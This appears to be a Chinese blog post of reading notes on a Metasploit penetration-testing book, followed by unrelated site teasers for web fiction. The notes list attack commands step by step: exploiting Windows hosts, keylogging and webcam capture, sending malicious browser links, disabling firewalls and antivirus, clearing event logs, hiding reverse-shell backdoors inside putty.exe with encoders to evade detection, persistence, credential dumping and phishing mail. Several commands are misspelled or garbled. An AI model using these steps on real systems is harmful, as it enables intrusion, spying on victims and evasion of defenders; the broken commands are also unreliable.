25.《Metasploit渗透测试与开发实践指南》笔记

一、安装VM、在VM中装XP、在VM中装kali

二、data、external、tools、plugins和scripts、exploits、auxiliary、payloads

三、漏洞利用基础
nmap -v -n 192.168.0.103(目标主机IP)
nmap -T4 -A -V 192.168.0.103
msf search dcom 在Metasploit中搜相关服务的漏洞
www.1337day.com / securityfocus/exploitdb 在线查找漏洞
gcc dcom.c -o dcom 下载后编译漏洞代码
./dcom 运行漏洞
./dcom 6 192.168.174.129 对目标主机IP进行攻击
msfconsole /: use exploit/windows/smb/msp8-067-nctapi 选择一个漏洞攻击
show options 查看攻击条件
set RHOST 192.168.0.103 设置目标主机IP地址革RHOST
exploit 攻击!

四、Metterpreter基础
help
sysinfo
screenshot
ps 显示正在运行的进程
migrate 1512 迁移进程ID
getpid 验证进程,被攻击主机当前进程
keyscan_start 启动按键记录器
keyscan_dump
keyscan_stop 停止按键记录
webcam_list 查看摄像头
webcam_snap 摄像头拍照
getuid 被攻击主机名字
shell
mkdir hacked
shutdown -s -t 15 -c "YOU ARE HACKED" 关闭被攻击主机,并显示一条消息

五、漏洞扫描与信息收集
whois 收集域名信息

use auxiliary/gather/search_email_collector    使用邮件收集模块
show options
set domain
run

use auxiliary/scanner/telnet/telnet_version    使用telnet版本扫描器
show options
set RHOSTS 192.168.0.103
run

use auxiliary/scanner/rdp/ms12_020_check    RDP扫描器
set PORTS 3389
set RHOST 192.168.11.46
run

nmap 192.168.11.29
nmap 192.168.11.46 192.168.11.29
nmap -iL /root/Desktop/list.txt    扫描目标列表
nmap -sp 192.168.11.2-60    ping扫描
nmap -PA 192.168.11.46    TCP ACK ping
nmap -pe 192.168.11.46    ICMP回显ping
nmap -R 66.147.244.90    强制DNS反向解析
nmap -sS 192.168.0.104    TCP SYN扫描
nmap -sN 192.168.0.103    TCP空扫描
nmap -scanflags SYNURG 192.168.0.102    自定义TCP扫描
nmap -F 192.168.11.46    快速扫描
nmap -P http 192.168.11.57    基于名称的端口扫描
nmap -r 192.168.11.46    顺序端口扫描
nmap -f 192.168.11.29    报文分析(Fragment Packets)
nmap -sI 192.168.11.29 192.168.11.46    空闲僵尸扫描(Idle Zombie Scan)
nmap -spoof -mac Apple 192.168.11.29    伪造MAC地址
nmap -oN scan.txt 192.168.11.46    保存扫描结果

load nessus    检测漏洞、错误配置、默认凭证
nessus_help
nessus_connect root:toor@localhost:8834 ok  连接本地主机
nessus_policy_list
nessus_new_scan -2 windowsxpSCAN 192.168.0.103  对目标主机扫描
nessus_scan_status
nessus_report_list    检查结果
nessus_report_hosts (report ID)    打开报告
nessus_report_host_ports 192.168.0.103 (report ID)    查看详细信息

db_status
db_import /root/Desttop/scan.xml    导入Nmap报告
hosts 192.168.0.102    从msf访问数据库
services 192.168.0.102    检查开放端口信息
db_import /root/Desktop/Nessus_scan.nessus    导入nessus报告
vulns 192.168.0.103    查看主机漏洞信息

六、客户端漏洞利用(生成恶意链接让被攻击者打开)
use auxiliary/server/browser autopwn 对浏览器攻击
show options
set LHOST 192.168.11.23 攻击者IP
set SRVHOST 192.168.11.23 服务器本地主机地址
set SRVPORT 80 本地端口地址
run 生成恶意UPR,发送给被攻击者
session
session -i 1 选择meterpreter会话对攻击目标执行攻击

use windows/browser/ms10_046_shortcat_icon_dllloader  IE快捷方式图标漏洞攻击
show options
set SRVHOST 192.168.0.109
set SRVPORT 80
set URIDATH 1
exploit
using URL:http://192.168.0.109:80/
session
session -i 1

use  exploit/windows/browser/ms10_022_ie_vbscript_windhlp32  IE恶意VB代码
show options
set SRVHOST 192.168.0.105
set SRVPORT 80
set URIPATH /
exploit
session
session -i 1

七、后漏洞利用
sysinfo
getpid
run checkvm
idletime 检查目标主机是否运行在虚拟机上
run get_env 检查目标主机是否正在运行
ipconfig
route 检查目标主机网络设置
run getcountermeasure 检查目标主机防火墙配置信息
run getgui 检查目标主机远程桌面
run getgui -e
run gettelnet
run gettelnet -e
run get_local_subnets
run hostedit
run hostedit -e 127.0.0.1 www.apple.com 添加host条目
run enum_logged_on_users
run enum_logged_on_users -c
run get_applicatioin_list
run windows/gather/forensics/enum_drives
run windows/gather/enum_ms_product_keys
run window/gather/crodentials/windows_autologin
run winenum 枚举系统信息
cd /root/msf4/logs/scripts/wineum/EXPLOIT_DFE265D 20130327-2532
cat hashdump.txt
run scrapper
cd /.msf4/logs/scripts/scraper/192.168.0.104 2013032756309503
cat services.txt 转储其他枚举脚本攻击提取到的信息

八、后漏洞利用——提权
use exploit/windows/http/minishare_get_overflow 远程缓冲溢出漏洞攻击代码
show options
set RHOST 192.168.0.102
set RPORT 80
show targets
set TARGET 3 设置目标系统类型
exploit

getuid
getsystem -h
getsystem -t 0  实现管理权限
ps

run post/windows/escalate/getsystem  提升权限
run post/windows/oscalate/service_permissions
use exploit/windows/brower/ms10_002_aurora  另一个漏洞攻击msf
show options
set SRVHOST 192.168.0.109
exploit

九、后漏洞利用——清除痕迹
run getcountermeasure 查看防火墙状态
netsh firewall show opmode
net firewall show opmode mode=disaable 禁用防火墙

upload root/Desktop/disable.vbs C:\  使用VB脚本禁用防火墙
cd C:\
disable.vbs

run killav  关闭杀毒软件
tasklist
tasklist /svc  对进程分类
tasklist /svc/find/I "avg"
sc queryex avgwd
sc config avgwd start=disabled  强制关闭杀毒软件进程
clearev  清除日志

十、后漏洞利用——后门
show payloads
cd /opt/metasploit/msf3 查看后门工具
./msfpayload -h
./msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 X>root/Desktop/vins.exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.105 R | msfencode -e x80/shikataa_nai -c 6 -t exe -x/root/Desktop/putty.exe -o /root/Desktop/viruspcotty.ext 后门程序发送给被攻击者

show encoders  编码器列表
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.105...  后门程序免杀处理

use exploit/multi/handler  当后门发给被攻击者后运行此命令
set PAYLOAD windows/meterpreter/reverse_tcp  设置攻击载荷信息
set LHOST 192.168.0.103
exploit

run metsvc -h  另一个后门程序metsvc
run metsvc -A  启动后门程序
run metsvc -r  删除后门程序

run persistence -h  持久性后门
run persistene -A -L c:\\ -s -x -p 445 i 10 -r 192.168.0.103  持久性后门运行
resource /root/.msf4/logs/persistence/PWNED -02526E0337...

upload /root/Desktop/nc.exe c:...  另一个持久性后门
run reg enumkey -k HKLM\\...
reg setval -k HKLM\\...
reg queryval =k HKLM\\..  netcat运行
netsh firewall add portopening ...
nc -v 192.168.0.107 445  用netcat连接被攻击者

十一、后漏洞利用——跳板与网络嗅探
ipconfig
route
run autoroute -h
run autoroute -s 10.10.10.1/24 添加一条指向目标主机的路由
run autoroute -p 验证是否添加成功
getsystem 提权
run hashdump 转储所有用户的散列密码

use auxiliary/scanner/portscan/tcp  扫描其他地址
show options
set rhosts 10.10.10.1/24
set ports 193,445
set threads 50
run

use exploit/windows/...  开始扫描
set rhost 10.10.10.2
set payload windows/...
exploit

use sinffer  使用嗅探器
sniffer interfaces  枚举网卡
sniffer_start 1
sniffer_dump 1 hacked.pcap  转储抓包
wireshark hacked.pcap

run packetrecorder  另一个嗅探工具
run packetrecorder -1i  抓包保存
run packetrecorder -i 1 -l/root/Desktop

load espia  截屏插件
screengrap

十二、Metasploit漏洞攻击代码研究

十三、使用社会工程学工具包和Armitage
进入SET目录,找到set_config文件,打开set_config文件,设置Metasploit的目录路径,将SENDMAIC设置为ON,EANIL_PROIPER设置为我们使用的软件的名字。安装sendmail程序。启动SET。选1执行后,选5进行邮件群发送

打开终端,输入armitage,之后根据默认一路next
开启扫描,选择Host|MSF scanf,输入IP
选择Hosts|Nmap Scan|Intense Scan,输入IP
选择Attacks|HailMary,开始自动攻击
攻陷后,右击被攻陷系统,选择Meterpreter|Interact。打开终端,输入vncviewer,输入得到的IP和端口,然后可看到被攻击对象的桌面了
选择Explore|browse Files
选择Access|Pump Hashers|scs method.选择View|Credentials,查看传输结果。
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,732评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,496评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,264评论 0 338
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,807评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,806评论 5 368
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,675评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,029评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,683评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 41,704评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,666评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,773评论 1 332
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,413评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,016评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,978评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,204评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,083评论 2 350
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,503评论 2 343

推荐阅读更多精彩内容